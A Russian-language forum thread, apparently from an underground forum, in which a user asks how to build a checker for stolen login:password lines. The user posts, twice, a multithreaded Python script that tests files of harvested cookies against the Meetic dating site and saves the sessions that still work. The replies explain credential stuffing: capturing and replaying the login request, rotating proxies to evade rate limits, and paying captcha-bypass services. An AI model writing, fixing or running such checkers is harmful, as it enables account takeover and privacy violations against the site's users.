Интересно узнать принцип, краткую структуру написания кода для сека строк формата log:pass. Ранее писал код для чека куков (прикреплю ниже) но там все по другому как мне кажется. На данном этапе у меня есть сухой шаблон кода где делает всю мануальную работу. Открывает браузер, вставляет строку в лог пас поле и пробует войти. Но как не странно все строки улетают в Error. В основном код ошибки 403 На 5-10 минут консультацию у кого есть опыт или желание помочь import requests from http import cookiejar import os from concurrent.futures import ThreadPoolExecutor # For multithreading from colorama import init, Fore # For colored text in the terminal # Initialize colorama init(autoreset=True) # Function to print the ASCII art in green color def print_banner(): banner = """ ******╗░**╗░░░**╗ ░******╗*******╗***╗░░**╗*******╗******╗░░*****╗░ **╔══**╗╚**╗░**╔╝ **╔════╝**╔════╝****╗░**║**╔════╝**╔══**╗**╔══**╗ ******╦╝░╚****╔╝░ ╚*****╗░*****╗░░**╔**╗**║*****╗░░******╦╝*******║ **╔══**╗░░╚**╔╝░░ ░╚═══**╗**╔══╝░░**║╚****║**╔══╝░░**╔══**╗**╔══**║ ******╦╝░░░**║░░░ ******╔╝*******╗**║░╚***║*******╗******╦╝**║░░**║ ╚═════╝░░░░╚═╝░░░ ╚═════╝░╚══════╝╚═╝░░╚══╝╚══════╝╚═════╝░╚═╝░░╚═╝ """ # Use colorama to print text in green print(Fore.GREEN + banner) # Print the banner right after the program starts print_banner() # Path to the cookie files folder path = input("Enter the path to the cookie database: ") # Path to the folder to save valid data path2 = input("Enter the path to the folder for saving valid data: ") # List of domains to check the cookies against domains = [ "https://www.meetic.fr", "https://www.meetic.es", "https://www.meetic.it", "https://meetic.fr", "https://meetic.es", "https://meetic.it" ] # Counters total_cookies = 0 invalid_cookies = 0 error_cookies = 0 valid_cookies = 0 # Function to process a single cookie file def process_cookie_file(file): global total_cookies, invalid_cookies, error_cookies, valid_cookies # Increment the total counter total_cookies += 1 # Open the cookie file try: with open(file, "r+", encoding="utf-8", errors="ignore") as f: cookie = f.read() except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # Write the cookie in Netscape format (compatible with requests) try: with open(file, "w", encoding="utf-8", errors="ignore") as s: s.write(str("# Netscape HTTP Cookie File" + "\n" + cookie)) except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # Load the cookie with MozillaCookieJar cj = cookiejar.MozillaCookieJar(file) try: cj.load() except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # Create a session for making requests session = requests.Session() # Loop through domains and check cookies for each domain for domain in domains: try: response = session.get(domain, cookies=cj).text except requests.exceptions.RequestException: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # For each domain, add specific keywords to check if cookies are valid if "Decouvrir" in response or "Likes" in response or "Loading" in response: valid_cookies += 1 # Increment the valid cookies counter try: # Remove the line "# Netscape HTTP Cookie File" from the cookie file with open(file, "r", encoding="utf-8", errors="ignore") as f: cookie = f.read() cookie = cookie.replace("# Netscape HTTP Cookie File\n", "") # Remove the line # Copy the cookie file to the valid data folder, saving it without the line valid_file_path = os.path.join(path2, f"{os.path.basename(file)}VALID.txt") with open(valid_file_path, "w", encoding="utf-8", errors="ignore") as f: f.write(cookie) # Print a message about valid cookies in green print(Fore.GREEN + f"{file} - Valid, copying to {path2}.") except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") else: invalid_cookies += 1 # Increment the invalid cookies counter # Print a message about invalid cookies in yellow print(Fore.YELLOW + f"{file} - Invalid") # Function to clear the folder and add only the ASCII art def clear_directory_and_add_banner(): # Clear the folder so it only contains the ASCII art for file_name in os.listdir(path2): file_path = os.path.join(path2, file_name) if os.path.isfile(file_path): os.remove(file_path) # Save the ASCII art in the folder banner = """ ******╗░**╗░░░**╗ ░******╗*******╗***╗░░**╗*******╗******╗░░*****╗░ **╔══**╗╚**╗░**╔╝ **╔════╝**╔════╝****╗░**║**╔════╝**╔══**╗**╔══**╗ ******╦╝░╚****╔╝░ ╚*****╗░*****╗░░**╔**╗**║*****╗░░******╦╝*******║ **╔══**╗░░╚**╔╝░░ ░╚═══**╗**╔══╝░░**║╚****║**╔══╝░░**╔══**╗**╔══**║ ******╦╝░░░**║░░░ ******╔╝*******╗**║░╚***║*******╗******╦╝**║░░**║ ╚═════╝░░░░╚═╝░░░ ╚═════╝░╚══════╝╚═╝░░╚══╝╚══════╝╚═════╝░╚═╝░░╚═╝ """ with open(os.path.join(path2, "banner.txt"), "w", encoding="utf-8") as banner_file: banner_file.write(banner) # Change to the working directory with cookie files os.chdir(path) # Function to clear the console def clear_console(): # Check the operating system to execute the clear command if os.name == 'nt': # For Windows os.system('cls') else: # For Linux/MacOS os.system('clear') # Function to wait for the user to press Enter before starting the check def wait_for_user_to_continue(): input("Press Enter to start checking cookies...") # Function to start processing all cookies def process_all_cookies(): # Create a thread pool with a maximum number of threads with ThreadPoolExecutor(max_workers=8) as executor: # Set max_workers as needed # Loop through the cookie files in the folder for i in os.listdir(path): # Process only files if os.path.isfile(i): file = f"{i}" executor.submit(process_cookie_file, file) # Submit the task to process the file in the pool # Function to print statistics after clearing the console and printing the ASCII art def print_statistics(): # Clear the console clear_console() # Print the ASCII art again print_banner() # Show the cookie processing statistics print("\nCookie processing statistics:") print(f"Total cookie files: {total_cookies}") print(f"Invalid cookies: {invalid_cookies}") print(f"Errors during processing: {error_cookies}") print(f"Valid cookies: {valid_cookies}") # Program execution if __name__ == '__main__': # Clear the console clear_console() # Print the banner again at the beginning print_banner() # Show the number of cookies for checking cookie_files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))] print(f"Number of cookie files to check: {len(cookie_files)}") # Wait for the user to press Enter before starting the check wait_for_user_to_continue() # Start the process of checking cookies process_all_cookies() # Print the statistics print_statistics() # Wait for the user to press Enter to close the program input("\nPress Enter to close the program...") Код import requests from http import cookiejar import os from concurrent.futures import ThreadPoolExecutor # For multithreading from colorama import init, Fore # For colored text in the terminal # Initialize colorama init(autoreset=True) # Function to print the ASCII art in green color def print_banner(): banner = """ ******╗░**╗░░░**╗ ░******╗*******╗***╗░░**╗*******╗******╗░░*****╗░ **╔══**╗╚**╗░**╔╝ **╔════╝**╔════╝****╗░**║**╔════╝**╔══**╗**╔══**╗ ******╦╝░╚****╔╝░ ╚*****╗░*****╗░░**╔**╗**║*****╗░░******╦╝*******║ **╔══**╗░░╚**╔╝░░ ░╚═══**╗**╔══╝░░**║╚****║**╔══╝░░**╔══**╗**╔══**║ ******╦╝░░░**║░░░ ******╔╝*******╗**║░╚***║*******╗******╦╝**║░░**║ ╚═════╝░░░░╚═╝░░░ ╚═════╝░╚══════╝╚═╝░░╚══╝╚══════╝╚═════╝░╚═╝░░╚═╝ """ # Use colorama to print text in green print(Fore.GREEN + banner) # Print the banner right after the program starts print_banner() # Path to the cookie files folder path = input("Enter the path to the cookie database: ") # Path to the folder to save valid data path2 = input("Enter the path to the folder for saving valid data: ") # List of domains to check the cookies against domains = [ "https://www.meetic.fr", "https://www.meetic.es", "https://www.meetic.it", "https://meetic.fr", "https://meetic.es", "https://meetic.it" ] # Counters total_cookies = 0 invalid_cookies = 0 error_cookies = 0 valid_cookies = 0 # Function to process a single cookie file def process_cookie_file(file): global total_cookies, invalid_cookies, error_cookies, valid_cookies # Increment the total counter total_cookies += 1 # Open the cookie file try: with open(file, "r+", encoding="utf-8", errors="ignore") as f: cookie = f.read() except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # Write the cookie in Netscape format (compatible with requests) try: with open(file, "w", encoding="utf-8", errors="ignore") as s: s.write(str("# Netscape HTTP Cookie File" + "\n" + cookie)) except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # Load the cookie with MozillaCookieJar cj = cookiejar.MozillaCookieJar(file) try: cj.load() except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # Create a session for making requests session = requests.Session() # Loop through domains and check cookies for each domain for domain in domains: try: response = session.get(domain, cookies=cj).text except requests.exceptions.RequestException: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") error_cookies += 1 # Increment the error counter return # For each domain, add specific keywords to check if cookies are valid if "Decouvrir" in response or "Likes" in response or "Loading" in response: valid_cookies += 1 # Increment the valid cookies counter try: # Remove the line "# Netscape HTTP Cookie File" from the cookie file with open(file, "r", encoding="utf-8", errors="ignore") as f: cookie = f.read() cookie = cookie.replace("# Netscape HTTP Cookie File\n", "") # Remove the line # Copy the cookie file to the valid data folder, saving it without the line valid_file_path = os.path.join(path2, f"{os.path.basename(file)}VALID.txt") with open(valid_file_path, "w", encoding="utf-8", errors="ignore") as f: f.write(cookie) # Print a message about valid cookies in green print(Fore.GREEN + f"{file} - Valid, copying to {path2}.") except Exception: # Print error with the file name without spaces between lines print(Fore.RED + f"{file} - Invalid format") else: invalid_cookies += 1 # Increment the invalid cookies counter # Print a message about invalid cookies in yellow print(Fore.YELLOW + f"{file} - Invalid") # Function to clear the folder and add only the ASCII art def clear_directory_and_add_banner(): # Clear the folder so it only contains the ASCII art for file_name in os.listdir(path2): file_path = os.path.join(path2, file_name) if os.path.isfile(file_path): os.remove(file_path) # Save the ASCII art in the folder banner = """ ******╗░**╗░░░**╗ ░******╗*******╗***╗░░**╗*******╗******╗░░*****╗░ **╔══**╗╚**╗░**╔╝ **╔════╝**╔════╝****╗░**║**╔════╝**╔══**╗**╔══**╗ ******╦╝░╚****╔╝░ ╚*****╗░*****╗░░**╔**╗**║*****╗░░******╦╝*******║ **╔══**╗░░╚**╔╝░░ ░╚═══**╗**╔══╝░░**║╚****║**╔══╝░░**╔══**╗**╔══**║ ******╦╝░░░**║░░░ ******╔╝*******╗**║░╚***║*******╗******╦╝**║░░**║ ╚═════╝░░░░╚═╝░░░ ╚═════╝░╚══════╝╚═╝░░╚══╝╚══════╝╚═════╝░╚═╝░░╚═╝ """ with open(os.path.join(path2, "banner.txt"), "w", encoding="utf-8") as banner_file: banner_file.write(banner) # Change to the working directory with cookie files os.chdir(path) # Function to clear the console def clear_console(): # Check the operating system to execute the clear command if os.name == 'nt': # For Windows os.system('cls') else: # For Linux/MacOS os.system('clear') # Function to wait for the user to press Enter before starting the check def wait_for_user_to_continue(): input("Press Enter to start checking cookies...") # Function to start processing all cookies def process_all_cookies(): # Create a thread pool with a maximum number of threads with ThreadPoolExecutor(max_workers=8) as executor: # Set max_workers as needed # Loop through the cookie files in the folder for i in os.listdir(path): # Process only files if os.path.isfile(i): file = f"{i}" executor.submit(process_cookie_file, file) # Submit the task to process the file in the pool # Function to print statistics after clearing the console and printing the ASCII art def print_statistics(): # Clear the console clear_console() # Print the ASCII art again print_banner() # Show the cookie processing statistics print("\nCookie processing statistics:") print(f"Total cookie files: {total_cookies}") print(f"Invalid cookies: {invalid_cookies}") print(f"Errors during processing: {error_cookies}") print(f"Valid cookies: {valid_cookies}") # Program execution if __name__ == '__main__': # Clear the console clear_console() # Print the banner again at the beginning print_banner() # Show the number of cookies for checking cookie_files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))] print(f"Number of cookie files to check: {len(cookie_files)}") # Wait for the user to press Enter before starting the check wait_for_user_to_continue() # Start the process of checking cookies process_all_cookies() # Print the statistics print_statistics() # Wait for the user to press Enter to close the program input("\nPress Enter to close the program...")
тебе надо понять как работает интернет для начала я не читал код там 200 строк и ниче не ясно ты лучше просто обьясни как ты пытаешься это сделать и что у тебя не получается
Еу ну это же индивидуально от сайта зависит. Где то просто можно работать с запросами, обходить кд авторизаций с помощью проксей, где то будет ебать мозг капча, которая байпасится сервисами, где то нужна будет эмуляция
Loss, Сайт простенький. защиты ноль, только нужно ****** юзать, в моей стране закрыт этот сайт. Может есть какие примеры для изучения?
ф12 нажимаешь вкладку сеть открываешь и смотришь запросы во время того как входишь в аккаунт а дальше все индивидуально для каждого сайта
Проблема на данный момент только одна, Я не могу понять получилось ли войти на сайт, ввести логин и пароль если в строке пишет просто Error
senebaa, ну так ты после отправки запроса на сайт с кредами получаешь куки чаще всего и потом по этим кукам пытайся получить профиль или че ты там хочешь и там чекай
Смотри открываешь панель разработчика (вроде так) заходишь в network водишь логин и пароль(к примеру) нажимаешь "логин" В запросах ищешь строки с твоими данными(payload чаще всего) теперь твоя задача отправлять этот запрос допустим через request, ну там много защит в чем основная проблема
1 причина - чатгпт попробуй сохранять html сайта - мне это очень помогало когда я не мог понять причину ошибок на сайте)..